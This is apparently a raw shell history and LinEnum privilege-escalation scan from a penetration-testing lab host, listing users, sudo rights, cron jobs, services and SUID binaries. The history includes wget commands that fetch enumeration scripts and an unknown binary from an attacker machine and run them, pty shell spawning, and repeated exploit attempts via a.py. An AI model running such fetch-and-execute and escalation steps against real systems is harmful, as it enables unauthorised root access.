- setfsuid
- ps -f -u user1
- ps -f -u bob
- ps -eo pid,euid,ruid,suid | grep 2174
- ps -eo pid,euid,ruid,suid | grep 2175
- ps -eo pid,euid,ruid,suid | grep 2203
- setuid(0)
- setuid() ;
- setuid(0)
- setuid('0')
- setuid(1001)
- setuid
- setuid() 1001
- setuid() -h
- man setuid
- seteuid(0)
- seteuid(1001)
- seteuid() ;
- seteuid(getuid())
- seteuid(getuid(1001))
- getenv("SUDO_UID")
- seteuid(0) /bin/bash
- /bin/bash
- $shell
- $ENV
- python
- pyton -c 'import pty;pty.spawn("/bin/bash")'
- python -c 'import pty;pty.spawn("/bin/bash")'
- cd /tmp
- ls
- wget http://10.11.0.86/linenu.sh
- wget http://10.11.0.86:8000/linenu.sh
- wget http://10.11.0.86:8000/linenum.sh
- wget http://10.11.0.86:8000/linuxprivchecker.py
- ls
- bash linenum.sh
- python linuxprivchecker.py
- wget http://10.11.0.86:8000/a.out
- ./a.out
- chmod +x a.out
- ./a.out
- id
- ps
- ps -aux
- ps -eo pid,euid,ruid,suid | grep 2272
- ps -eo pid,euid,ruid,suid | grep 2175
- nano a.py
- python a.py
- nano a.py
- python a.py
- nano a.py
- python a.py
- ps -eo pid,euid,ruid,suid | grep 2175
- sudo
- sudo -h
- sudo --help
- sudo -l
- nano a.py
- python a.py
- nano a.py
- python a.py
- ps -eo pid,euid,ruid,suid | grep 2175
- ps
- ps -eo pid,euid,ruid,suid | grep 2760
- ps -eo pid,euid,ruid,suid | grep 2893
- ps
- /bin/bash
- /bin/sh
- ls
- python a.py
- ps -efl | grep 'sleep 1' | grep -v grep | { read PID REST ; echo $PID;
- lsps -efl | grep 'sleep 1' | grep -v gre
- ps -efl | grep 'sleep 1' | grep -v gre
- ps -efl | grep 'sleep 1' | grep -v grep
- ps -efl | grep 'sleep 1' | grep -v grep
- ps -efl | grep 'sleep 1' | grep -v grep
- ps -efl | grep 'sleep 1' | grep -v grep
- ps -efl | grep 'sleep 1' | grep -v grep
- ps -efl | grep 'sleep 1' | grep -v grep
- ps -efl | grep 'sleep 1' | grep -v grep
- ps -efl | grep 'sleep 1' | grep -v grep
- ps -efl | grep 'sleep 1' | grep -v
- ps -efl | grep 'sleep 1'
- ps -efl | grep 'sleep 1'
- python a.p
- python a.py
- ls /proc
- cd 2893
- ls
- ls /proc/2893
- ls /proc/2893/fd
- ls /proc/2893/fd/1
- ls /proc/2893/fd/1
- cat /proc/2893/fd/1
- echo n> /proc/2893/fd/1
- echo n >/proc/2893/fd/1
- cat /proc/2893/fd/1
- echo n >/proc/2893/fd/1
- loc
- ps -efl | grep 'sleep 1' | grep -v grep | { read PID REST ; echo $PID; }
- ps -efl | grep 'sleep 1' | grep -v grep | { read PID REST ; echo $PID;
- ps -efl | grep 'sleep 1' | grep -v grep
- ps -efl | grep 'sleep 1' | grep -v grep|cut -d " " -f 4
- ps -efl | grep 'sleep 1' | grep -v grep|awk {'print $3'}
- ps -efl | grep 'sleep 1' | grep -v grep|awk {'print $4'}
- python a.py
- python a.py
- nano a.py
- python a.py
- nano a.py
- python a.py
- nano a.py
- python a.py
- nano a.py
- python a.py
- nano a.py
- whoami
- id
- ps aux
- /bin/sh
- ls
- whoami
- id
- /bin/bash
- [-] Any interesting mail in /var/mail:
- total 8
- drwxrwsr-x 2 root mail 4096 2007-09-05 19:45 .
- drwxr-xr-x 13 root root 4096 2007-09-05 19:45 ..
- ### SCAN COMPLETE ####################################
- #########################################################
- # Local Linux Enumeration & Privilege Escalation Script #
- #########################################################
- # www.rebootuser.com
- # version 0.91
- [-] Debug Info
- [+] Thorough tests = Disabled (SUID/GUID checks will not be performed!)
- Scan started at:
- Wed Aug 8 03:56:00 EDT 2018
- ### SYSTEM ##############################################
- [-] Kernel information:
- Linux sufferance 2.6.30.5-ph33r #1 SMP Sat Aug 29 16:20:59 EDT 2009 i686 GNU/Linux
- [-] Kernel information (continued):
- Linux version 2.6.30.5-ph33r (root@sufference) (gcc version 4.1.2 20061115 (prerelease) (Debian 4.1.1-21)) #1 SMP Sat Aug 29 16:20:59 EDT 2009
- [-] Hostname:
- sufferance
- ### USER/GROUP ##########################################
- [-] Current user/group info:
- uid=1001(bob) gid=1001(bob) groups=1001(bob)
- [-] Users that have previously logged onto the system:
- Username Port From Latest
- root tty1 Thu Jun 9 07:30:24 -0400 2016
- bob pts/1 10.11.0.86 Wed Aug 8 03:21:49 -0400 2018
- [-] Who else is logged on:
- 03:56:00 up 9:27, 2 users, load average: 0.00, 0.00, 0.00
- USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
- bob pts/0 10.11.0.86 03:14 37:04m 0.00s 0.00s -bash
- bob pts/1 10.11.0.86 03:21 5.00s 0.05s 0.04s bash linenum.sh
- [-] Group memberships:
- uid=0(root) gid=0(root) groups=0(root)
- uid=1(daemon) gid=1(daemon) groups=1(daemon)
- uid=2(bin) gid=2(bin) groups=2(bin)
- uid=3(sys) gid=3(sys) groups=3(sys)
- uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
- uid=5(games) gid=60(games) groups=60(games)
- uid=6(man) gid=12(man) groups=12(man)
- uid=7(lp) gid=7(lp) groups=7(lp)
- uid=8(mail) gid=8(mail) groups=8(mail)
- uid=9(news) gid=9(news) groups=9(news)
- uid=10(uucp) gid=10(uucp) groups=10(uucp)
- uid=13(proxy) gid=13(proxy) groups=13(proxy)
- uid=33(www-data) gid=33(www-data) groups=33(www-data)
- uid=34(backup) gid=34(backup) groups=34(backup)
- uid=38(list) gid=38(list) groups=38(list)
- uid=39(irc) gid=39(irc) groups=39(irc)
- uid=41(gnats) gid=41(gnats) groups=41(gnats)
- uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
- uid=100(Debian-exim) gid=102(Debian-exim) groups=102(Debian-exim)
- uid=101(statd) gid=65534(nogroup) groups=65534(nogroup)
- uid=102(identd) gid=65534(nogroup) groups=65534(nogroup)
- uid=103(sshd) gid=65534(nogroup) groups=65534(nogroup)
- uid=1001(bob) gid=1001(bob) groups=1001(bob)
- [-] Contents of /etc/passwd:
- root:x:0:0:root:/root:/bin/bash
- daemon:x:1:1:daemon:/usr/sbin:/bin/sh
- bin:x:2:2:bin:/bin:/bin/sh
- sys:x:3:3:sys:/dev:/bin/sh
- sync:x:4:65534:sync:/bin:/bin/sync
- games:x:5:60:games:/usr/games:/bin/sh
- man:x:6:12:man:/var/cache/man:/bin/sh
- lp:x:7:7:lp:/var/spool/lpd:/bin/sh
- mail:x:8:8:mail:/var/mail:/bin/sh
- news:x:9:9:news:/var/spool/news:/bin/sh
- uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
- proxy:x:13:13:proxy:/bin:/bin/sh
- www-data:x:33:33:www-data:/var/www:/bin/sh
- backup:x:34:34:backup:/var/backups:/bin/sh
- list:x:38:38:Mailing List Manager:/var/list:/bin/sh
- irc:x:39:39:ircd:/var/run/ircd:/bin/sh
- gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
- nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
- Debian-exim:x:100:102::/var/spool/exim4:/bin/false
- statd:x:101:65534::/var/lib/nfs:/bin/false
- identd:x:102:65534::/var/run/identd:/bin/false
- sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
- bob:x:1001:1001::/home/bob:/bin/bash
- [-] Super user account(s):
- root
- [+] We can sudo without supplying a password!
- usage: sudo [-HPSb] [-p prompt] [-u username|#uid]
- { -e file [...] | -i | -s | <command> }
- [+] We can read root's home directory!
- total 36K
- drwxr-xr-x 4 root root 4.0K 2016-06-09 07:29 .
- drwxr-xr-x 22 root root 4.0K 2009-08-26 05:54 ..
- drwx------ 2 root root 4.0K 2007-09-05 19:55 .aptitude
- -rw------- 1 root root 35 2016-06-09 07:30 .bash_history
- -rw-r--r-- 1 root root 633 2016-04-19 03:53 .bashrc
- -rw-r--r-- 1 root root 110 2004-11-10 11:10 .profile
- ---------- 1 root root 33 2015-02-27 19:33 proof.txt
- drwx------ 2 root root 4.0K 2011-01-29 13:07 .ssh
- -rw------- 1 root root 1 2016-04-19 03:52 .viminfo
- [-] Are permissions on /home directories lax:
- total 12K
- drwxr-xr-x 3 root root 4.0K 2008-10-05 19:21 .
- drwxr-xr-x 22 root root 4.0K 2009-08-26 05:54 ..
- drwxr-xr-x 4 bob 1000 4.0K 2011-01-29 13:07 bob
- [-] Root is allowed to login via SSH:
- PermitRootLogin yes
- ### ENVIRONMENTAL #######################################
- [-] Environment information:
- SHELL=/bin/bash
- TERM=xterm-256color
- SSH_CLIENT=10.11.0.86 44278 22
- SSH_TTY=/dev/pts/1
- USER=bob
- PATH=/usr/local/bin:/usr/bin:/bin:/usr/games
- MAIL=/var/mail/bob
- PWD=/tmp
- LANG=en_US.UTF-8
- HOME=/home/bob
- SHLVL=2
- LOGNAME=bob
- SSH_CONNECTION=10.11.0.86 44278 10.11.1.136 22
- _=/usr/bin/env
- [-] Path information:
- /usr/local/bin:/usr/bin:/bin:/usr/games
- [-] Available shells:
- # /etc/shells: valid login shells
- /bin/csh
- /bin/sh
- /usr/bin/es
- /usr/bin/ksh
- /bin/ksh
- /usr/bin/rc
- /usr/bin/tcsh
- /bin/tcsh
- /usr/bin/esh
- /bin/bash
- /bin/rbash
- [-] Current umask value:
- u=rwx,g=rx,o=rx
- 0022
- [-] Password and storage information:
- PASS_MAX_DAYS 99999
- PASS_MIN_DAYS 0
- PASS_WARN_AGE 7
- ### JOBS/TASKS ##########################################
- [-] Cron jobs:
- -rw-r--r-- 1 root root 724 2006-12-19 19:02 /etc/crontab
- /etc/cron.d:
- total 12
- drwxr-xr-x 2 root root 4096 2007-09-05 19:48 .
- drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
- -rw-r--r-- 1 root root 102 2006-12-19 19:02 .placeholder
- /etc/cron.daily:
- total 56
- drwxr-xr-x 2 root root 4096 2008-10-07 16:41 .
- drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
- -rwxr-xr-x 1 root root 5041 2007-02-26 16:21 apt
- -rwxr-xr-x 1 root root 314 2007-03-14 10:11 aptitude
- -rwxr-xr-x 1 root root 502 2007-01-02 12:26 bsdmainutils
- -rwxr-xr-x 1 root root 3961 2007-01-20 04:46 exim4-base
- -rwxr-xr-x 1 root root 419 2006-08-06 04:12 find
- -rwxr-xr-x 1 root root 89 2006-04-08 18:16 logrotate
- -rwxr-xr-x 1 root root 946 2007-01-29 07:20 man-db
- -rw-r--r-- 1 root root 102 2006-12-19 19:02 .placeholder
- -rwxr-xr-x 1 root root 383 2008-05-29 06:21 samba
- -rwxr-xr-x 1 root root 3283 2006-12-19 19:02 standard
- -rwxr-xr-x 1 root root 1307 2006-05-25 05:38 sysklogd
- /etc/cron.hourly:
- total 12
- drwxr-xr-x 2 root root 4096 2007-09-05 19:48 .
- drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
- -rw-r--r-- 1 root root 102 2006-12-19 19:02 .placeholder
- /etc/cron.monthly:
- total 16
- drwxr-xr-x 2 root root 4096 2007-09-05 19:48 .
- drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
- -rw-r--r-- 1 root root 102 2006-12-19 19:02 .placeholder
- -rwxr-xr-x 1 root root 129 2006-12-19 19:02 standard
- /etc/cron.weekly:
- total 20
- drwxr-xr-x 2 root root 4096 2007-09-05 19:54 .
- drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
- -rwxr-xr-x 1 root root 520 2007-01-29 07:20 man-db
- -rw-r--r-- 1 root root 102 2006-12-19 19:02 .placeholder
- -rwxr-xr-x 1 root root 1092 2006-05-25 05:38 sysklogd
- [-] Crontab contents:
- # /etc/crontab: system-wide crontab
- # Unlike any other crontab you don't have to run the `crontab'
- # command to install the new version when you edit this file
- # and files in /etc/cron.d. These files also have username fields,
- # that none of the other crontabs do.
- SHELL=/bin/sh
- PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
- # m h dom mon dow user command
- 17 * * * * root cd / && run-parts --report /etc/cron.hourly
- 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
- 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
- 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
- #
- ### NETWORKING ##########################################
- [-] Network and IP info:
- eth0 Link encap:Ethernet HWaddr 00:50:56:B8:8E:C5
- inet addr:10.11.1.136 Bcast:10.11.255.255 Mask:255.255.0.0
- inet6 addr: fe80::250:56ff:feb8:8ec5/64 Scope:Link
- UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
- RX packets:81969 errors:2 dropped:4 overruns:0 frame:0
- TX packets:28019 errors:0 dropped:0 overruns:0 carrier:0
- collisions:0 txqueuelen:1000
- RX bytes:7185584 (6.8 MiB) TX bytes:5028079 (4.7 MiB)
- Interrupt:18 Base address:0x2000
- lo Link encap:Local Loopback
- inet addr:127.0.0.1 Mask:255.0.0.0
- inet6 addr: ::1/128 Scope:Host
- UP LOOPBACK RUNNING MTU:16436 Metric:1
- RX packets:18 errors:0 dropped:0 overruns:0 frame:0
- TX packets:18 errors:0 dropped:0 overruns:0 carrier:0
- collisions:0 txqueuelen:0
- RX bytes:1572 (1.5 KiB) TX bytes:1572 (1.5 KiB)
- [-] Nameserver(s):
- nameserver 10.11.1.220
- nameserver 10.11.1.221
- [-] Listening TCP:
- Active Internet connections (servers and established)
- Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
- tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN -
- tcp 0 0 0.0.0.0:113 0.0.0.0:* LISTEN -
- tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
- tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN -
- tcp 0 0 10.11.1.136:445 10.11.0.60:60674 ESTABLISHED-
- tcp6 0 0 :::22 :::* LISTEN -
- tcp6 0 1212 ::ffff:10.11.1.136:22 ::ffff:10.11.0.86:44278 ESTABLISHED-
- tcp6 0 0 ::ffff:10.11.1.136:22 ::ffff:10.11.0.86:44154 ESTABLISHED-
- [-] Listening UDP:
- Active Internet connections (servers and established)
- Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
- udp 0 0 10.11.1.136:137 0.0.0.0:* -
- udp 0 0 0.0.0.0:137 0.0.0.0:* -
- udp 0 0 10.11.1.136:138 0.0.0.0:* -
- udp 0 0 0.0.0.0:138 0.0.0.0:* -
- ### SERVICES #############################################
- [-] Running processes:
- USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
- root 1 0.0 0.0 1940 640 ? Ss Aug07 0:01 init [2]
- root 2 0.0 0.0 0 0 ? S< Aug07 0:00 [kthreadd]
- root 3 0.0 0.0 0 0 ? S< Aug07 0:00 [migration/0]
- root 4 0.0 0.0 0 0 ? S< Aug07 0:00 [ksoftirqd/0]
- root 5 0.0 0.0 0 0 ? S< Aug07 0:00 [watchdog/0]
- root 6 0.0 0.0 0 0 ? S< Aug07 0:00 [events/0]
- root 7 0.0 0.0 0 0 ? S< Aug07 0:00 [cpuset]
- root 8 0.0 0.0 0 0 ? S< Aug07 0:00 [khelper]
- root 13 0.0 0.0 0 0 ? S< Aug07 0:00 [async/mgr]
- root 60 0.0 0.0 0 0 ? S< Aug07 0:00 [kblockd/0]
- root 62 0.0 0.0 0 0 ? S< Aug07 0:00 [kacpid]
- root 63 0.0 0.0 0 0 ? S< Aug07 0:00 [kacpi_notify]
- root 174 0.0 0.0 0 0 ? S< Aug07 0:00 [kseriod]
- root 224 0.0 0.0 0 0 ? S Aug07 0:00 [khungtaskd]
- root 225 0.0 0.0 0 0 ? S Aug07 0:00 [pdflush]
- root 226 0.0 0.0 0 0 ? S Aug07 0:00 [pdflush]
- root 227 0.0 0.0 0 0 ? S< Aug07 0:00 [kswapd0]
- root 228 0.0 0.0 0 0 ? S< Aug07 0:00 [aio/0]
- root 229 0.0 0.0 0 0 ? S< Aug07 0:00 [crypto/0]
- bob 705 0.2 0.3 19220 3176 ? S Aug07 1:17 /usr/lib/vmware-tools/sbin32/vmtoolsd -n vmusr
- bob 736 0.0 0.3 19220 3176 ? S Aug07 0:27 /usr/lib/vmware-tools/sbin32/vmtoolsd -n vmusr
- root 787 0.0 0.0 0 0 ? S< Aug07 0:00 [ata/0]
- root 809 0.0 0.0 0 0 ? S< Aug07 0:00 [ata_aux]
- root 810 0.0 0.0 0 0 ? S< Aug07 0:00 [scsi_eh_0]
- root 811 0.0 0.0 0 0 ? S< Aug07 0:00 [scsi_eh_1]
- root 954 0.0 0.0 0 0 ? S< Aug07 0:00 [mpt_poll_0]
- root 970 0.0 0.0 0 0 ? S< Aug07 0:00 [scsi_eh_2]
- root 1183 0.0 0.2 7668 2224 ? Ss 03:14 0:00 sshd: bob [priv]
- bob 1185 0.0 0.1 7668 1560 ? S 03:14 0:00 sshd: bob@pts/0
- bob 1186 0.0 0.1 4484 1972 pts/0 Ss+ 03:14 0:00 -bash
- root 1194 0.0 0.2 9340 2936 ? S 03:18 0:00 /usr/sbin/smbd -D
- root 1201 0.0 0.0 0 0 ? S< Aug07 0:00 [kjournald]
- root 1482 0.0 0.0 0 0 ? S< Aug07 0:00 [kstriped]
- root 1485 0.0 0.0 0 0 ? S< Aug07 0:00 [ksnapd]
- root 1650 0.0 0.3 33948 3888 ? Sl Aug07 0:22 /usr/sbin/vmtoolsd
- root 1864 0.0 0.0 1620 616 ? Ss Aug07 0:00 /sbin/syslogd
- root 1870 0.0 0.0 1572 372 ? Ss Aug07 0:00 /sbin/klogd -x
- root 1923 0.0 0.2 7668 2220 ? Ss 03:21 0:00 sshd: bob [priv]
- root 1924 0.0 0.0 1568 560 ? Ss Aug07 0:00 /usr/sbin/acpid -c /etc/acpi/events -s /var/run/acpid.socket
- bob 1926 0.0 0.1 7828 1568 ? S 03:21 0:00 sshd: bob@pts/1
- bob 1927 0.0 0.1 4476 1924 pts/1 Ss 03:21 0:00 -bash
- 100 1967 0.0 0.0 5308 996 ? Ss Aug07 0:00 /usr/sbin/exim4 -bd -q30m
- root 1981 0.0 0.0 1744 568 ? Ss Aug07 0:00 /usr/sbin/inetd
- root 1988 0.0 0.1 5884 1388 ? Ss Aug07 0:01 /usr/sbin/nmbd -D
- root 1990 0.0 0.2 9052 2532 ? Ss Aug07 0:00 /usr/sbin/smbd -D
- root 1999 0.0 0.1 9052 1092 ? S Aug07 0:00 /usr/sbin/smbd -D
- root 2003 0.0 0.1 4920 1088 ? Ss Aug07 0:00 /usr/sbin/sshd
- root 2030 0.0 0.0 0 0 ? S< Aug07 0:00 [rpciod/0]
- root 2031 0.0 0.0 0 0 ? S< Aug07 0:00 [nfsiod]
- root 2037 0.0 0.0 3504 516 ? Ss Aug07 0:00 /usr/sbin/rpc.idmapd
- daemon 2047 0.0 0.0 1824 408 ? Ss Aug07 0:00 /usr/sbin/atd
- root 2054 0.0 0.0 2188 760 ? Ss Aug07 0:00 /usr/sbin/cron
- root 2087 0.0 0.0 1568 492 tty1 Ss+ Aug07 0:00 /sbin/getty 38400 tty1
- root 2088 0.0 0.0 1568 492 tty2 Ss+ Aug07 0:00 /sbin/getty 38400 tty2
- root 2089 0.0 0.0 1568 488 tty3 Ss+ Aug07 0:00 /sbin/getty 38400 tty3
- root 2090 0.0 0.0 1568 492 tty4 Ss+ Aug07 0:00 /sbin/getty 38400 tty4
- root 2091 0.0 0.0 1568 488 tty5 Ss+ Aug07 0:00 /sbin/getty 38400 tty5
- root 2092 0.0 0.0 1568 488 tty6 Ss+ Aug07 0:00 /sbin/getty 38400 tty6
- bob 2104 0.8 0.2 4900 2204 pts/1 S+ 03:55 0:00 bash linenum.sh
- bob 2464 1.0 0.1 4916 1840 pts/1 R+ 03:55 0:00 bash linenum.sh
- bob 2466 0.0 0.0 2744 504 pts/1 S+ 03:55 0:00 tee -a
- bob 2645 0.0 0.1 4916 1604 pts/1 R+ 03:56 0:00 bash linenum.sh
- bob 2646 0.0 0.0 3424 980 pts/1 R+ 03:56 0:00 ps aux
- [-] Process binaries and associated permissions (from above list):
- 16K -rwxr-xr-x 1 root root 15K 2007-02-21 12:48 /sbin/getty
- 24K -rwxr-xr-x 1 root root 23K 2006-05-25 05:38 /sbin/klogd
- 28K -rwxr-xr-x 1 root root 28K 2006-05-25 05:38 /sbin/syslogd
- 696K -rwxr-xr-x 2 root root 689K 2015-02-27 19:06 /usr/lib/vmware-tools/sbin32/vmtoolsd
- 20K -rwxr-xr-x 1 root root 18K 2006-01-15 16:24 /usr/sbin/acpid
- 16K -rwxr-xr-x 1 root root 16K 2006-01-03 02:15 /usr/sbin/atd
- 32K -rwxr-xr-x 1 root root 31K 2006-12-19 19:02 /usr/sbin/cron
- 676K -rwsr-xr-x 1 root root 672K 2007-01-20 04:46 /usr/sbin/exim4
- 32K -rwxr-xr-x 1 root root 29K 2007-03-21 14:12 /usr/sbin/inetd
- 900K -rwxr-xr-x 1 root root 893K 2008-05-29 06:21 /usr/sbin/nmbd
- 36K -rwxr-xr-x 1 root root 35K 2007-05-16 06:41 /usr/sbin/rpc.idmapd
- 3.1M -rwxr-xr-x 1 root root 3.1M 2008-05-29 06:21 /usr/sbin/smbd
- 316K -rwxr-xr-x 1 root root 312K 2007-03-05 11:38 /usr/sbin/sshd
- 0 lrwxrwxrwx 1 root root 37 2015-02-27 19:06 /usr/sbin/vmtoolsd -> /usr/lib/vmware-tools/sbin32/vmtoolsd
- [-] Contents of /etc/inetd.conf:
- # /etc/inetd.conf: see inetd(8) for further informations.
- #
- # Internet superserver configuration database
- #
- #
- # Lines starting with "#:LABEL:" or "#<off>#" should not
- # be changed unless you know what you are doing!
- #
- # If you want to disable an entry so it isn't touched during
- # package updates just comment it out with a single '#' character.
- #
- # Packages should modify this file by using update-inetd(8)
- #
- # <service_name> <sock_type> <proto> <flags> <user> <server_path> <args>
- #
- #:INTERNAL: Internal services
- #discard stream tcp nowait root internal
- #discard dgram udp wait root internal
- #daytime stream tcp nowait root internal
- #time stream tcp nowait root internal
- #:STANDARD: These are standard services.
- #:BSD: Shell, login, exec and talk are BSD protocols.
- #:MAIL: Mail, news and uucp services.
- #:INFO: Info services
- ident stream tcp wait identd /usr/sbin/identd identd
- #:BOOT: TFTP service is provided primarily for booting. Most sites
- # run this only on machines acting as "boot servers."
- #:RPC: RPC based services
- #:HAM-RADIO: amateur-radio services
- #:OTHER: Other services
- #<off># netbios-ssn stream tcp nowait root /usr/sbin/tcpd /usr/sbin/smbd
- [-] The related inetd binary permissions:
- -rwxr-xr-x 1 root root 4280 2007-02-25 15:06 /usr/sbin/tcpd
- [-] /etc/init.d/ binary permissions:
- total 332
- drwxr-xr-x 2 root root 4096 2015-02-27 19:06 .
- drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
- -rwxr-xr-x 1 root root 1850 2006-01-14 06:12 acpid
- -rwxr-xr-x 1 root root 969 2006-01-03 02:15 atd
- -rwxr-xr-x 1 root root 5089 2006-09-20 07:33 bootclean
- -rwxr-xr-x 1 root root 2146 2006-09-12 17:30 bootlogd
- -rwxr-xr-x 1 root root 1915 2006-09-20 07:27 bootmisc.sh
- -rwxr-xr-x 1 root root 2930 2006-09-14 04:20 checkfs.sh
- -rwxr-xr-x 1 root root 9548 2006-09-23 03:34 checkroot.sh
- -rwxr-xr-x 1 root root 6110 2006-09-05 12:15 console-screen.sh
- -rwxr-xr-x 1 root root 1761 2006-10-12 14:55 cron
- -rwxr-xr-x 1 root root 7104 2007-01-18 12:45 exim4
- -rwxr-xr-x 1 root root 5823 2007-07-30 16:39 glibc.sh
- -rwxr-xr-x 1 root root 1360 2007-01-13 13:52 halt
- -rwxr-xr-x 1 root root 1287 2006-09-12 17:31 hostname.sh
- -rwxr-xr-x 1 root root 3886 2007-02-21 12:48 hwclock.sh
- -rwxr-xr-x 1 root root 2518 2006-09-15 14:03 ifupdown
- -rwxr-xr-x 1 root root 1046 2006-09-15 14:03 ifupdown-clean
- -rwxr-xr-x 1 root root 3484 2006-10-15 23:38 keymap.sh
- -rwxr-xr-x 1 root root 944 2006-09-12 17:31 killprocs
- -rwxr-xr-x 1 root root 1375 2006-05-25 05:38 klogd
- -rwxr-xr-x 1 root root 417 2006-08-08 18:38 libdevmapper1.02
- -rwxr-xr-x 1 root root 1054 2006-09-06 17:43 makedev
- -rwxr-xr-x 1 root root 1793 2006-11-14 06:12 module-init-tools
- -rwxr-xr-x 1 root root 617 2006-01-15 06:04 mountall-bootclean.sh
- -rwxr-xr-x 1 root root 1718 2006-09-12 17:30 mountall.sh
- -rwxr-xr-x 1 root root 2206 2006-10-03 14:22 mountdevsubfs.sh
- -rwxr-xr-x 1 root root 2394 2006-09-25 04:36 mountkernfs.sh
- -rwxr-xr-x 1 root root 615 2006-01-15 06:04 mountnfs-bootclean.sh
- -rwxr-xr-x 1 root root 2299 2006-11-26 08:35 mountnfs.sh
- -rwxr-xr-x 1 root root 3668 2006-11-26 10:13 mtab.sh
- -rwxr-xr-x 1 root root 1898 2007-01-16 04:06 nbd-server
- -rwxr-xr-x 1 root root 2550 2007-01-06 10:36 networking
- -rwxr-xr-x 1 root root 6644 2007-05-16 06:41 nfs-common
- -rwxr-xr-x 1 root root 4340 2007-05-16 06:41 nfs-kernel-server
- -rwxr-xr-x 1 root root 1241 2006-10-09 08:29 nfs-user-server
- -rwxr-xr-x 1 root root 2324 2007-02-25 15:29 openbsd-inetd
- -rwxr-xr-x 1 root root 1525 2006-12-22 03:15 portmap
- -rwxr-xr-x 1 root root 997 2006-09-12 21:42 procps.sh
- -rwxr-xr-x 1 root root 8045 2006-11-27 17:23 rc
- -rwxr-xr-x 1 root root 798 2006-09-28 13:25 rc.local
- -rwxr-xr-x 1 root root 480 2012-01-22 07:06 rc.py
- -rwxr-xr-x 1 root root 117 2005-12-02 12:44 rcS
- -rw-r--r-- 1 root root 1386 2006-09-13 02:10 README
- -rwxr-xr-x 1 root root 655 2006-09-22 10:21 reboot
- -rwxr-xr-x 1 root root 994 2006-09-12 17:30 rmnologin
- -rwxr-xr-x 1 root root 2153 2008-05-29 06:10 samba
- -rwxr-xr-x 1 root root 1376 2006-11-27 17:23 sendsigs
- -rwxr-xr-x 1 root root 585 2006-09-12 17:32 single
- -rw-r--r-- 1 root root 4187 2006-09-12 17:32 skeleton
- -rwxr-xr-x 1 root root 1891 2007-03-05 11:38 ssh
- -rwxr-xr-x 1 root root 520 2006-09-12 17:26 stop-bootlogd
- -rwxr-xr-x 1 root root 730 2006-10-02 13:14 stop-bootlogd-single
- -rwxr-xr-x 1 root root 541 2006-04-06 15:58 sudo
- -rwxr-xr-x 1 root root 2037 2006-05-25 05:38 sysklogd
- -rw-r--r-- 1 root root 8178 2006-12-19 05:21 udev
- -rw-r--r-- 1 root root 1252 2006-03-28 02:44 udev-mtab
- -rwxr-xr-x 1 root root 3175 2006-11-25 04:22 umountfs
- -rwxr-xr-x 1 root root 2128 2006-11-26 13:23 umountnfs.sh
- -rwxr-xr-x 1 root root 1122 2006-09-30 10:37 umountroot
- -rwxr-xr-x 1 root root 1815 2006-09-12 17:30 urandom
- -rwxr-xr-x 1 root root 41912 2015-02-27 19:06 vmware-tools
- ### SOFTWARE #############################################
- [-] Sudo version:
- Sudo version 1.6.8p12
- ### INTERESTING FILES ####################################
- [-] Useful file locations:
- /bin/nc
- /bin/netcat
- /usr/bin/wget
- /usr/bin/gcc
- [-] Installed compilers:
- ii gcc 4.1.1-15 The GNU C compiler
- ii gcc-4.1 4.1.1-21 The GNU C compiler
- [-] Can we read/write sensitive files:
- -rw-r--r-- 1 root root 945 2008-10-07 16:34 /etc/passwd
- -rw-r--r-- 1 root root 503 2008-10-05 19:21 /etc/group
- -rw-r--r-- 1 root root 475 2006-10-28 09:42 /etc/profile
- -rw-r----- 1 root shadow 680 2016-06-09 07:29 /etc/shadow
- [-] NFS config details:
- -rw-r--r-- 1 root root 1 2008-10-11 14:30 /etc/exports
- [-] Can't search *.conf files as no keyword was entered
- [-] Can't search *.php files as no keyword was entered
- [-] Can't search *.log files as no keyword was entered
- [-] Can't search *.ini files as no keyword was entered
- [-] All *.conf files in /etc (recursive 1 level):
- -rw-r--r-- 1 root root 1183 2008-10-07 16:41 /etc/inetd.conf
- -rw-r--r-- 1 root root 624 2006-07-07 22:43 /etc/mtools.conf
- -rw-r--r-- 1 root root 240 2007-09-05 20:01 /etc/kernel-img.conf
- -rw-r--r-- 1 root root 899 2006-10-29 10:27 /etc/gssapi_mech.conf
- -rw-r--r-- 1 root root 599 2005-09-03 08:49 /etc/logrotate.conf
- -rw-r--r-- 1 root root 2555 2004-12-06 08:59 /etc/reportbug.conf
- -rw-r--r-- 1 root root 1260 2007-02-25 14:30 /etc/ucf.conf
- -rw-r--r-- 1 root root 149 2007-09-05 20:29 /etc/modules.conf
- -rw-r--r-- 1 root root 9 2006-08-07 13:14 /etc/host.conf
- -rw-r--r-- 1 root root 330 2007-03-06 21:17 /etc/mke2fs.conf
- -rw-r--r-- 1 root root 475 2006-08-28 12:33 /etc/nsswitch.conf
- -rw-r--r-- 1 root root 145 2007-09-05 20:00 /etc/idmapd.conf
- -rw-r--r-- 1 root root 552 2004-07-31 16:34 /etc/pam.conf
- -rw-r--r-- 1 root root 2673 2006-12-20 14:31 /etc/debconf.conf
- -rw-r--r-- 1 root root 600 2007-01-19 02:25 /etc/deluser.conf
- -rw-r--r-- 1 root root 33 2007-09-05 19:45 /etc/ld.so.conf
- -rw-r--r-- 1 root root 2803 2007-09-05 19:48 /etc/adduser.conf
